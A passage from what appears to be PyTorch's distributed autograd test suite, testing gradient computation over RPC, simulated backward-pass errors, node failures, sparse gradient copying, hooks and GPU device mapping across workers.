r4 = self._exec_func(exec_mode, torch.div, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [r1, r2, r3, r4], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_different_dtypes(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True, dtype=torch.float32)
t2 = torch.rand((3, 3), requires_grad=True, dtype=torch.float64)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
loss = self._exec_func(exec_mode, torch.add, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, my_py_add, t1, t2)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_script_call(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [
ExecMode.LOCAL,
ExecMode.RPC_SYNC,
ExecMode.RPC_ASYNC,
ExecMode.REMOTE,
]:
with dist_autograd.context() as context_id:
forward_ret = self._exec_func(exec_mode, my_script_add, t1, t2)
loss = forward_ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@staticmethod
def _complex_python_udf(t1, t2):
t3 = torch.nn.functional.linear(t1, t2)
t4 = torch.nn.functional.linear(t2, t3)
t5 = torch.nn.functional.linear(t3, t4)
return torch.linalg.multi_dot([t1, t2, t3, t4, t5])
@dist_init
def test_backward_complex_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._complex_python_udf, t1, t2
)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@staticmethod
def _python_udf_with_backward_error(t1, t2):
t3 = t1 + t2
t4 = SimulateBackwardError.apply(t3)
return torch.linalg.multi_dot([t1, t2, t3, t4])
@staticmethod
def _nested_rpc_call_backward_error(t1, t2, dst):
t1 = t1 * t2
t2 = t1 + t2
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2),
)
return torch.linalg.multi_dot([t1, t2, res])
@dist_init
def test_backward_python_udf_error(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_rpc_call_backward_error,
args=(t1, t2, self._next_rank()),
)
with self.assertRaisesRegex(
RuntimeError, "Simulate error on backward pass"
):
dist_autograd.backward(context_id, [loss.sum()])
_backward_done = False
@dist_init(clean_shutdown=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure_python_udf(self):
# Set a short timeout to quickly time out failed RPCs.
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
dst = self._next_rank()
res = rpc.rpc_sync(
worker_name(dst),
my_py_nested_call,
args=(t1, t2, dst, self.world_size, 1),
)
dist.barrier()
# Kill rank 2 (last hop of nested rpc) and verify rank 0 receives an error.
if self.rank == 2:
return
store = dist.distributed_c10d._get_default_store()
if self.rank == 0:
# Wait for rank 2 to die.
shutdown_error_regex = self.get_shutdown_error_regex()
wait_until_node_failure(2, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex().
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since rank 2 is dead.
dist_autograd.backward(context_id, [res.sum()])
# Mark rank 0 is done in the store, since the RPC framework on
# some nodes might be broken at this point (listenLoop() in
# ProcessGroupAgent might've exited).
store.set('test_backward_node_failure_python_udf_rank0_done', "True")
else:
# Wait for backward to finish on rank 0.
store.wait(['test_backward_node_failure_python_udf_rank0_done'], timedelta(seconds=10))
@staticmethod
def _nested_python_udf(t1, t2, dst):
t3 = t1 * t2
t4 = t1 + t2
res = rpc.rpc_sync(worker_name(dst), my_py_add, args=(t3, t4))
return torch.linalg.multi_dot([t1, t2, t3, t4, res])
@dist_init
def test_backwards_nested_python_udf(self):
# Run equivalent of _nested_python_udf locally.
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = t1 * t2
t4 = t1 + t2
res = t3 + t4
loss = torch.linalg.multi_dot([t1, t2, t3, t4, res]).sum()
torch.autograd.backward([loss])
# Now run distributed autograd.
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_python_udf,
args=(t1, t2, self._next_rank()),
)
dist_autograd.backward(context_id, [loss.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
_test_clean_context_backward_context_id = None
class MyBackwardFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
assert DistAutogradTest._test_clean_context_backward_context_id is not None
# Release the context to simulate error (use barrier before releasing
# context to ensure all nodes execute the backward function).
dist.barrier()
dist_autograd._release_context(
DistAutogradTest._test_clean_context_backward_context_id
)
# Verify all contexts are cleaned up.
assert _all_contexts_cleaned_up()
return input
@dist_init
def test_clean_context_during_backward(self):
"""
This test simulates the situation where the 'backward' call might throw
an exception locally which would lead to the autograd context being
cleaned up if we're using the context manager. As a result, the autograd
context might be cleaned up while some threads are still using the
autograd context.
It is fine for the 'backward' call to throw an exception in this test,
but the process should not crash.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
context = dist_autograd._new_context()
context_id = context._context_id()
DistAutogradTest._test_clean_context_backward_context_id = context_id
# Send the context id to all nodes.
for i in range(0, self.world_size):
if i != self.rank:
rank_distance = (i - self.rank + self.world_size) % self.world_size
rpc.rpc_sync(
worker_name(i),
_set_rpc_done,
args=(context_id, rank_distance),
)
dist.barrier()
# Verify all context ids have been received.
self.assertEqual(self.world_size - 1, len(known_context_ids))
t1 = torch.rand((3, 3), requires_grad=True)
for i in range(0, 100):
dst = self._next_rank()
t1 = rpc.rpc_sync(worker_name(dst), torch.add, args=(t1, t1))
# Call MyBackwardFunc as the first op of the backward pass to
# ensure we release the context early in the backward pass.
t1 = DistAutogradTest.MyBackwardFunc.apply(t1)
self.assertEqual(100, len(context._send_functions()))
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd.backward(context_id, [t1.sum()])
# HACK: Killing workers since otherwise the autograd engine gets stuck on
# other nodes. The proper fix would be addressing:
# https://github.com/pytorch/pytorch/issues/27643, which would inform
# other nodes about the failure.
# The autograd engine gets stuck on other nodes since they're waiting to
# receive gradients from the node that received an error (and as a
# result it didn't execute the rest of the graph).
dist.barrier()
rpc.shutdown(graceful=False)
sys.exit(0)
@classmethod
def _call_remote_embedding(cls, embedding_rref, input, offsets, per_sample_weights):
embedding = embedding_rref.local_value()
return embedding(input, offsets, per_sample_weights)
@classmethod
def _get_grad(cls, embedding_rref, context_id):
embedding = embedding_rref.local_value()
grad_map = dist_autograd.get_gradients(context_id)
# Can't send sparse tensors over RPC: https://github.com/pytorch/pytorch/issues/30807
return grad_map[embedding.weight].to_dense()
@dist_init
def test_embedding_bag_with_no_grad_tensors(self):
dst = self._next_rank()
remote_embedding = rpc.remote(
worker_name(dst),
torch.nn.EmbeddingBag,
args=(16, 16),
kwargs={"mode": "sum", "sparse": True},
)
local_embedding = torch.nn.EmbeddingBag(16, 16, mode="sum", sparse=True)
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
# requires_grad = True to record send/recv functions
per_sample_weights = torch.rand((8), requires_grad=True)
offsets = torch.LongTensor([0, 4])
local_res = local_embedding(input, offsets, per_sample_weights)
# Run backward twice.
torch.autograd.backward([local_res.sum()], retain_graph=True)
torch.autograd.backward([local_res.sum()])
local_grad = local_embedding.weight.grad
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._call_remote_embedding,
args=(remote_embedding, input, offsets, per_sample_weights),
)
# Run backward twice to test accumulation of sparse gradients.
dist_autograd.backward(context_id, [res.sum()], retain_graph=True)
dist_autograd.backward(context_id, [res.sum()])
remote_grad = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._get_grad,
args=(remote_embedding, context_id),
)
self.assertEqual(local_grad.to_dense(), remote_grad)
@classmethod
def _mixed_requires_grad(cls, t1, t2):
if t2.requires_grad:
return t1 - t2
else:
return t1 * t2
@dist_init
def test_mixed_requires_grad(self):
for exec_mode in [ExecMode.RPC_SYNC, ExecMode.REMOTE]:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=False)
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._mixed_requires_grad, t1, t2
)
self.assertEqual(t1 * t2, ret)
dist_autograd.backward(context_id, [ret.sum()])
self.assertTrue(t1.requires_grad)
self.assertFalse(t2.requires_grad)
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t1, grads)
self.assertNotIn(t2, grads)
self.assertEqual(t2, grads[t1])
class TestDebugInfoFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
backward_passes = int(debug_info["num_current_backward_passes"])
# Hard to validate exact numbers because of the distributed nature.
# We can't use a barrier() here since that would block the single
# CPU thread available for autograd and can cause deadlocks.
assert backward_passes >= 1 and backward_passes <= 4
return input
@dist_init
def test_debug_info(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
i = 0
res = {}
res[i] = t1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
# Call custom function in middle of backward pass to ensure all
# nodes are still waiting on a backward().
res[i + 1] = DistAutogradTest.TestDebugInfoFunc.apply(res[i])
i += 1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
dist_autograd.backward(context_id, [res[i].sum()])
debug_info = dist_autograd._get_debug_info()
num_autograd_context = int(debug_info["num_autograd_contexts"])
# Need atleast one context and not more than 4.
self.assertTrue(num_autograd_context >= 1 and num_autograd_context <= 4)
for rd in range(self.world_size - 1):
rpc.rpc_sync(
worker_name((self.rank + rd + 1) % self.world_size),
_set_rpc_done,
args=(context_id, rd + 1),
)
dist.barrier()
# Validate information
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
self.assertEqual(0, int(debug_info["num_current_backward_passes"]))
# only have `num_current_backward_passes` and `num_autograd contexts`
self.assertTrue(len(debug_info) == 2)
self.assertTrue(_all_contexts_cleaned_up())
# All contexts should be cleaned up.
debug_info = dist_autograd._get_debug_info()
self.assertEqual(0, int(debug_info["num_autograd_contexts"]))
@staticmethod
def _workload_thread():
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = rpc.rpc_sync("worker0", torch.add, args=(t1, t2))
t4 = rpc.rpc_sync("worker0", torch.mul, args=(t2, t3))
t5 = rpc.rpc_sync("worker0", torch.matmul, args=(t3, t4))
t6 = rpc.rpc_sync("worker0", torch.add, args=(t4, t5))
dist_autograd.backward(context_id, [t6.sum()])
@dist_init
def test_async_dist_autograd(self):
"""
This test ensures async processing for distributed autograd works
appropriately. This is achieved by spawning multiple threads and
hammering a single node with a lot of backward() calls.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
if self.rank != 0:
# All other ranks schedule work on rank 0.
threads = []
for i in range(20):
t = threading.Thread(target=DistAutogradTest._workload_thread)
t.start()
threads.append(t)
for thread in threads:
thread.join()
dist.barrier()
@dist_init
def test_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = torch.matmul(t1, t2)
# Run backward twice.
torch.autograd.backward([t3.sum()], retain_graph=True)
torch.autograd.backward([t3.sum()])
t3 = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
# Run backward twice.
dist_autograd.backward(context_id, [t3.sum()], retain_graph=True)
dist_autograd.backward(context_id, [t3.sum()])
# Verify the gradients are same for local and remote execution.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@staticmethod
def _test_nested_backward_accumulate_grads(t1, t2, dst_rank):
return rpc.rpc_sync(worker_name(dst_rank), torch.matmul, args=(t1, t2))
@dist_init
def test_nested_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._test_nested_backward_accumulate_grads,
args=(t1, t2, self._next_rank()),
).sum()
# Run backward twice.
dist_autograd.backward(context_id, [loss], retain_graph=True)
dist_autograd.backward(context_id, [loss])
@dist_init
def test_multiple_backward(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
# Run backward in a loop multiple times.
for i in range(1000):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init(clean_shutdown=False)
def test_multiple_backward_with_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
'worker{}'.format(self._next_rank()),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2)).sum()
try:
# Run backward in a loop multiple times.
for i in range(100):
if i < 50:
with self.assertRaisesRegex(RuntimeError, "Simulate error on backward pass"):
dist_autograd.backward(context_id, [loss], retain_graph=True)
elif i > 50:
# Recovered from error.
dist_autograd.backward(context_id, [loss], retain_graph=True)
else:
dist.barrier()
SimulateBackwardError._simulate_error = False
dist.barrier()
finally:
# Sync before resetting flag.
dist.barrier()
# Reset the flag.
SimulateBackwardError._simulate_error = True
@dist_init
def test_backward_verify_hooks(self):
t1 = torch.ones((3, 3), requires_grad=True)
# Double the gradient.
t1.register_hook(lambda grad: grad * 2)
t2 = torch.ones((3, 3), requires_grad=True)
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, torch.matmul, t1, t2)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_no_grad_copy(self):
'''
Similar to test in test_autograd.py.
'''
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class MyFuncSingleGrad(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFuncSingleGrad.static_grad_ptr = grad.data_ptr()
return grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [NonContGradFunc.apply(MyFunc.apply(a, b))])
grads = dist_autograd.get_gradients(context_id)
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for a
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFuncSingleGrad.apply(a)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFuncSingleGrad.static_grad_ptr
p_a = grads[a].data_ptr()
# Verify there was no clone.
self.assertTrue(p_a == p_g)
# Test case that should trigger copy for both of a,b. This is
# different in the distributed autograd case since we hold
# a reference to all grads in a vector until all accumulation is done.
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFunc.apply(a, b)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a].data_ptr()
p_b = grads[b].data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# both should be copied.
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
@dist_init
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for a.
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
# check a uses the same buffer
self.assertTrue(p_a == p_g)
# Run backwards multiple times.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
with dist_autograd.context() as context_id:
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = NonContGradFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
p_b = grads[b]._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to verify accumulation.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init
def test_grad_copy_sparse_indices_extra_ref(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
static_grad_indices_ref = None
static_grad_values_ref = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
# indices() and values() return views, so holding onto
# references of them would not increment refcount of indices
# and values inside the sparse tensor.
MyFunc.static_grad_indices_ref = grad._indices()
MyFunc.static_grad_values_ref = grad._values()
return grad
a = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
self.assertIsNotNone(MyFunc.static_grad_indices_ref)
self.assertIsNotNone(MyFunc.static_grad_values_ref)
# grad would be stolen, since static_grad_indices_ref and
# static_grad_values_ref are holding onto views and don't bump the
# refcount.
self.assertTrue(p_g == p_a)
@dist_init
def test_post_hooks(self):
self.hook_called_times = 0
def post_hook_add_one(output_grads, input_grads):
self.hook_called_times += 1
return output_grads
def post_hook_add_two(output_grads, input_grads):
self.hook_called_times += 2
return output_grads
t = torch.rand(10, 10, requires_grad=True)
a = t + t
# Register post hooks
accumulate_grad_0 = a.grad_fn.next_functions[0][0]
accumulate_grad_0.register_hook(post_hook_add_one)
accumulate_grad_0.register_hook(post_hook_add_two)
accumulate_grad_1 = a.grad_fn.next_functions[1][0]
accumulate_grad_1.register_hook(post_hook_add_two)
with dist_autograd.context() as context_id:
loss = a.sum()
dist_autograd.backward(context_id, [loss])
self.assertEqual(5, self.hook_called_times)
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(1, len(grads))
self.assertTrue(t in grads)
@staticmethod
def _slow_add(t1, t2):
time.sleep(1)
t3 = t1 + t2
t3.requires_grad = True
return t3
@dist_init
def test_thread_local_context_id(self):
t1 = torch.rand((3, 3))
t2 = torch.rand((3, 3))
t3 = t1 + t2
t3.requires_grad = True
t3.sum().backward()
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, DistAutogradTest._slow_add, args=(t1, t2))
with dist_autograd.context() as context_id:
loss = rref.to_here().sum()
# due to slow add, the continuation of this backward pass will be
# invoked by the previous rpc.remote thread which does not have a
# valid context_id. So, this can test whether we propagate
# thread_local states properly when jumping across threads on the
# server side.
dist_autograd.backward(context_id, [loss])
self.assertTrue(
rpc.rpc_sync(
dst,
_compare_owner_value,
args=(context_id, rref, t3.grad)
)
)
class CudaDistAutogradTest(CommonDistAutogradTest):
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_simple(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
(t1 + t2).sum().backward()
with dist_autograd.context() as context_id:
t3 = t1 + t2
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
t7 = self._exec_func(exec_mode, torch.add, t6.cpu(), t5)
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t7.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation_gpu_root(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t6.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
class FaultyAgentDistAutogradTest(RpcAgentTestFixture):
# Reusing a simplified helper function from DistAutogradTest to ensure
# autograd context is successfully cleaned up even when RPCs are failing.
def context_cleanup_test_helper(self, rpc_args, func):
initialize_pg(self.file_init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could.
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
class WrapperModule(nn.Module):
def __init__(self, model, device):
super().__init__()
self.model = model.to(device)
def forward(self, *args):
return self.model(*args)
def gradients(self, ctx_id):
grads = dist_autograd.get_gradients(ctx_id)
return [grads[p] for p in self.model.parameters()]
class TensorPipeCudaDistAutogradTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(4)
def test_device_maps_backward_pass(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t1 = torch.rand(10, device=self.rank, requires_grad=True)
t2 = torch.rand(10, device=self.rank, requires_grad=True)
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(dst, torch.add, args=(t1, t2))
dist_autograd.backward(context_id, [res.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(torch.ones(10), grads[t1])
self.assertEqual(torch.ones(10), grads[t2])
self.assertEqual(t1.device, grads[t1].device)
self.assertEqual(t2.device, grads[t2].device)
rpc.shutdown()
class MyRemoteCompute(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, input):
input = input * 2.0
return input
class MyLocalCompute(torch.nn.Module):
def __init__(self, next_stage):
super().__init__()
self.next_stage = next_stage
def forward(self, input):
return self.next_stage.rpc_sync().forward(input)
@skip_if_lt_x_gpu(4)
def test_dist_autograd_sync_streams(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
remote_compute = rpc.remote(dst, TensorPipeCudaDistAutogradTest.MyRemoteCompute)
local_compute = TensorPipeCudaDistAutogradTest.MyLocalCompute(remote_compute)
for _ in range(10):
input = torch.rand([1000, 10000], device=self.rank, requires_grad=True)
# Run local autograd
result = input * 2.0
r = random.random()
loss = result.sum() * r
loss.backward()
# Run distributed autograd
with dist_autograd.context() as context_id:
result = local_compute(input)
loss = result.sum() * r
dist_autograd.backward(context_id, [loss])
# Compare grads.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(input.grad, grads[input])
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_gradients_synchronizations(self):
options = self.rpc_backend_options
for peer_rank in range(self.world_size):
options.set_device_map(worker_name(peer_rank), {self.rank: peer_rank})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# this is master
layers = [nn.Linear(2000, 2000) for _ in range(self.world_size - 1)]
local_layers = [l.to(0) for l in layers]
remote_layers = []
for rank in range(1, self.world_size):
remote_layers.append(rpc.remote(
worker_name(rank),
WrapperModule,
args=(layers[rank - 1], rank)
))
